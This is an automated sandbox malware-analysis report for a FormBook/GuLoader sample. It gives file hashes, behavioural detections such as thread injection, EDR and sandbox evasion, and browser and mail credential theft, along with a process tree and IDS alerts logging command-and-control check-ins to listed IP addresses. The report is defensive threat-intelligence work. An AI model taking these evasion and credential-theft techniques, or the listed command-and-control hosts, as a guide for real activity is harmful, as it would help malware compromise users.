Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
02Eh1ah35H.exe

Overview

General Information

Sample name:02Eh1ah35H.exe
Analysis ID:1588655
MD5:8b28f25bafe08a5b838ee152a75d14ae
SHA1:ed2b19ce4a23e1bb09f76658f9b257baaa4d7f59
SHA256:8c4c1550cb63a4c8abebb1ef8a7601953c6c1f0d02f1080f1fb7adc306b99c31
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • 02Eh1ah35H.exe (PID: 5468 cmdline: "C:\Users\user\Desktop\02Eh1ah35H.exe" MD5: 8B28F25BAFE08A5B838EE152A75D14AE)
    • 02Eh1ah35H.exe (PID: 312 cmdline: "C:\Users\user\Desktop\02Eh1ah35H.exe" MD5: 8B28F25BAFE08A5B838EE152A75D14AE)
      • RAVCpl64.exe (PID: 6612 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • waitfor.exe (PID: 3964 cmdline: "C:\Windows\SysWOW64\waitfor.exe" MD5: E58E152B44F20DD099C5105DE482DF24)
          • firefox.exe (PID: 532 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000000.00000002.28256040548.0000000004AC5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-11T03:54:04.926119+010028032702Potentially Bad Traffic192.168.11.2049757122.201.127.17443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-11T03:54:45.568527+010028554651A Network Trojan was detected192.168.11.204975876.223.54.14680TCP
          2025-01-11T03:55:09.280919+010028554651A Network Trojan was detected192.168.11.2049762209.74.77.10980TCP
          2025-01-11T03:55:23.809286+010028554651A Network Trojan was detected192.168.11.204976627.124.4.24680TCP
          2025-01-11T03:55:37.881023+010028554651A Network Trojan was detected192.168.11.204977046.30.211.3880TCP
          2025-01-11T03:55:51.550443+010028554651A Network Trojan was detected192.168.11.2049774103.224.182.24280TCP
          2025-01-11T03:56:14.334123+010028554651A Network Trojan was detected192.168.11.2049778101.35.209.18380TCP
          2025-01-11T03:56:28.848208+010028554651A Network Trojan was detected192.168.11.2049782154.23.178.23180TCP
          2025-01-11T03:56:43.045554+010028554651A Network Trojan was detected192.168.11.2049786208.91.197.3980TCP
          2025-01-11T03:56:58.145411+010028554651A Network Trojan was detected192.168.11.204979043.205.198.2980TCP
          2025-01-11T03:57:50.189413+010028554651A Network Trojan was detected192.168.11.2049794104.21.40.16780TCP
          2025-01-11T03:58:03.907573+010028554651A Network Trojan was detected192.168.11.2049798172.67.167.14680TCP
          2025-01-11T03:58:17.620504+010028554651A Network Trojan was detected192.168.11.204980274.48.143.8280TCP
          2025-01-11T03:58:31.955137+010028554651A Network Trojan was detected192.168.11.2049806134.0.14.15880TCP
          2025-01-11T03:58:50.627514+010028554651A Network Trojan was detected192.168.11.204981013.248.169.4880TCP
          2025-01-11T03:59:00.369045+010028554651A Network Trojan was detected192.168.11.2049811202.92.5.2380TCP
          2025-01-11T03:59:17.698245+010028554651A Network Trojan was detected192.168.11.204981576.223.54.14680TCP
          2025-01-11T03:59:31.176179+010028554651A Network Trojan was detected192.168.11.2049819209.74.77.10980TCP
          2025-01-11T03:59:50.277219+010028554651A Network Trojan was detected192.168.11.204983127.124.4.24680TCP
          2025-01-11T04:00:03.991441+010028554651A Network Trojan was detected192.168.11.204983546.30.211.3880TCP
          2025-01-11T04:00:17.434038+010028554651A Network Trojan was detected192.168.11.2049840103.224.182.24280TCP
          2025-01-11T04:02:04.289281+010028554651A Network Trojan was detected192.168.11.2049851101.35.209.18380TCP
          2025-01-11T04:02:18.380678+010028554651A Network Trojan was detected192.168.11.2049855154.23.178.23180TCP
          2025-01-11T04:02:32.210110+010028554651A Network Trojan was detected192.168.11.2049859208.91.197.3980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-11T03:53:23.819296+010028554641A Network Trojan was detected192.168.11.204980174.48.143.8280TCP
          2025-01-11T03:53:23.819296+010028554641A Network Trojan was detected192.168.11.2049785208.91.197.3980TCP
          2025-01-11T03:53:23.819296+010028554641A Network Trojan was detected192.168.11.2049857208.91.197.3980TCP
          2025-01-11T03:53:23.819296+010028554641A Network Trojan was detected192.168.11.2049856208.91.197.3980TCP
          2025-01-11T03:53:23.819296+010028554641A Network Trojan was detected192.168.11.2049784208.91.197.3980TCP
          2025-01-11T03:53:23.819296+010028554641A Network Trojan was detected192.168.11.2049858208.91.197.3980TCP
          2025-01-11T03:53:23.819296+010028554641A Network Trojan was detected192.168.11.2049783208.91.197.3980TCP
          2025-01-11T03:55:01.176956+010028554641A Network Trojan was detected192.168.11.2049759209.74.77.10980TCP
          2025-01-11T03:55:03.881805+010028554641A Network Trojan was detected192.168.11.2049760209.74.77.10980TCP
          2025-01-11T03:55:06.581594+010028554641A Network Trojan was detected192.168.11.2049761209.74.77.10980TCP
          2025-01-11T03:55:15.332388+010028554641A Network Trojan was detected192.168.11.204976327.124.4.24680TCP
          2025-01-11T03:55:18.147796+010028554641A Network Trojan was detected192.168.11.204976427.124.4.24680TCP
          2025-01-11T03:55:20.970815+010028554641A Network Trojan was detected192.168.11.204976527.124.4.24680TCP
          2025-01-11T03:55:29.636004+010028554641A Network Trojan was detected192.168.11.204976746.30.211.3880TCP
          2025-01-11T03:55:32.403975+010028554641A Network Trojan was detected192.168.11.204976846.30.211.3880TCP
          2025-01-11T03:55:35.140069+010028554641A Network Trojan was detected192.168.11.204976946.30.211.3880TCP
          2025-01-11T03:55:43.439727+010028554641A Network Trojan was detected192.168.11.2049771103.224.182.24280TCP
          2025-01-11T03:55:46.131151+010028554641A Network Trojan was detected192.168.11.2049772103.224.182.24280TCP
          2025-01-11T03:55:48.839680+010028554641A Network Trojan was detected192.168.11.2049773103.224.182.24280TCP
          2025-01-11T03:56:05.828727+010028554641A Network Trojan was detected192.168.11.2049775101.35.209.18380TCP
          2025-01-11T03:56:08.682285+010028554641A Network Trojan was detected192.168.11.2049776101.35.209.18380TCP
          2025-01-11T03:56:11.511147+010028554641A Network Trojan was detected192.168.11.2049777101.35.209.18380TCP
          2025-01-11T03:56:20.357203+010028554641A Network Trojan was detected192.168.11.2049779154.23.178.23180TCP
          2025-01-11T03:56:23.194046+010028554641A Network Trojan was detected192.168.11.2049780154.23.178.23180TCP
          2025-01-11T03:56:26.024403+010028554641A Network Trojan was detected192.168.11.2049781154.23.178.23180TCP
          2025-01-11T03:56:49.523833+010028554641A Network Trojan was detected192.168.11.204978743.205.198.2980TCP
          2025-01-11T03:56:52.407065+010028554641A Network Trojan was detected192.168.11.204978843.205.198.2980TCP
          2025-01-11T03:56:55.278593+010028554641A Network Trojan was detected192.168.11.204978943.205.198.2980TCP
          2025-01-11T03:57:04.914307+010028554641A Network Trojan was detected192.168.11.2049791104.21.40.16780TCP
          2025-01-11T03:57:07.554421+010028554641A Network Trojan was detected192.168.11.2049792104.21.40.16780TCP
          2025-01-11T03:57:10.194586+010028554641A Network Trojan was detected192.168.11.2049793104.21.40.16780TCP
          2025-01-11T03:57:55.926131+010028554641A Network Trojan was detected192.168.11.2049795172.67.167.14680TCP
          2025-01-11T03:57:58.584754+010028554641A Network Trojan was detected192.168.11.2049796172.67.167.14680TCP
          2025-01-11T03:58:01.255991+010028554641A Network Trojan was detected192.168.11.2049797172.67.167.14680TCP
          2025-01-11T03:58:09.523718+010028554641A Network Trojan was detected192.168.11.204979974.48.143.8280TCP
          2025-01-11T03:58:12.216537+010028554641A Network Trojan was detected192.168.11.204980074.48.143.8280TCP
          2025-01-11T03:58:23.737850+010028554641A Network Trojan was detected192.168.11.2049803134.0.14.15880TCP
          2025-01-11T03:58:26.487680+010028554641A Network Trojan was detected192.168.11.2049804134.0.14.15880TCP
          2025-01-11T03:58:29.262425+010028554641A Network Trojan was detected192.168.11.2049805134.0.14.15880TCP
          2025-01-11T03:58:38.580625+010028554641A Network Trojan was detected192.168.11.204980713.248.169.4880TCP
          2025-01-11T03:58:42.261542+010028554641A Network Trojan was detected192.168.11.204980813.248.169.4880TCP
          2025-01-11T03:58:45.934839+010028554641A Network Trojan was detected192.168.11.204980913.248.169.4880TCP
          2025-01-11T03:59:08.678068+010028554641A Network Trojan was detected192.168.11.204981276.223.54.14680TCP
          2025-01-11T03:59:11.335536+010028554641A Network Trojan was detected192.168.11.204981376.223.54.14680TCP
          2025-01-11T03:59:14.010948+010028554641A Network Trojan was detected192.168.11.204981476.223.54.14680TCP
          2025-01-11T03:59:23.068250+010028554641A Network Trojan was detected192.168.11.2049816209.74.77.10980TCP
          2025-01-11T03:59:25.769546+010028554641A Network Trojan was detected192.168.11.2049817209.74.77.10980TCP
          2025-01-11T03:59:28.475160+010028554641A Network Trojan was detected192.168.11.2049818209.74.77.10980TCP
          2025-01-11T03:59:41.789744+010028554641A Network Trojan was detected192.168.11.204982727.124.4.24680TCP
          2025-01-11T03:59:44.633395+010028554641A Network Trojan was detected192.168.11.204982927.124.4.24680TCP
          2025-01-11T03:59:47.429103+010028554641A Network Trojan was detected192.168.11.204983027.124.4.24680TCP
          2025-01-11T03:59:55.740908+010028554641A Network Trojan was detected192.168.11.204983246.30.211.3880TCP
          2025-01-11T03:59:58.492319+010028554641A Network Trojan was detected192.168.11.204983346.30.211.3880TCP
          2025-01-11T04:00:01.239378+010028554641A Network Trojan was detected192.168.11.204983446.30.211.3880TCP
          2025-01-11T04:00:09.347195+010028554641A Network Trojan was detected192.168.11.2049837103.224.182.24280TCP
          2025-01-11T04:00:12.052651+010028554641A Network Trojan was detected192.168.11.2049838103.224.182.24280TCP
          2025-01-11T04:00:14.729798+010028554641A Network Trojan was detected192.168.11.2049839103.224.182.24280TCP
          2025-01-11T04:01:55.768799+010028554641A Network Trojan was detected192.168.11.2049848101.35.209.18380TCP
          2025-01-11T04:01:58.587138+010028554641A Network Trojan was detected192.168.11.2049849101.35.209.18380TCP
          2025-01-11T04:02:01.448165+010028554641A Network Trojan was detected192.168.11.2049850101.35.209.18380TCP
          2025-01-11T04:02:09.905500+010028554641A Network Trojan was detected192.168.11.2049852154.23.178.23180TCP
          2025-01-11T04:02:12.730647+010028554641A Network Trojan was detected192.168.11.2049853154.23.178.23180TCP
          2025-01-11T04:02:15.561790+010028554641A Network Trojan was detected192.168.11.2049854154.23.178.23180TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: 02Eh1ah35H.exeAvira: detected
          Multi AV Scanner detection for submitted file
          Source: 02Eh1ah35H.exeReversingLabs: Detection: 50%
          Source: 02Eh1ah35H.exeVirustotal: Detection: 69%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: 02Eh1ah35H.exeJoe Sandbox ML: detected
          Source: 02Eh1ah35H.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 122.201.127.17:443 -> 192.168.11.20:49757 version: TLS 1.2
          Source: 02Eh1ah35H.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: waitfor.pdbGCTL source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp
          Source: Binary string: waitfor.pdb source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 02Eh1ah35H.exe, 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_0040674C FindFirstFileW,FindClose,0_2_0040674C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405B00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
          Source: C:\Windows\SysWOW64\waitfor.exeCode function: 4x nop then mov ebx, 00000004h4_2_050804CE

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49758 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49770 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49763 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49762 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49759 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49775 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49766 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49810 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49778 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49771 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49779 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49837 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49811 -> 202.92.5.23:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49840 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49767 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49859 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49815 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49786 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49819 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49790 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49832 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49839 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49794 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49792 -> 104.21.40.167:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49838 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49796 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49782 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49798 -> 172.67.167.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49808 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49834 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49817 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49848 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49851 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49853 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49788 -> 43.205.198.29:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49800 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49802 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49849 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49830 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49812 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49833 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49813 -> 76.223.54.146:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49804 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49818 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49816 -> 209.74.77.109:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49854 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49774 -> 103.224.182.242:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49814 -> 76.223.54.146:80
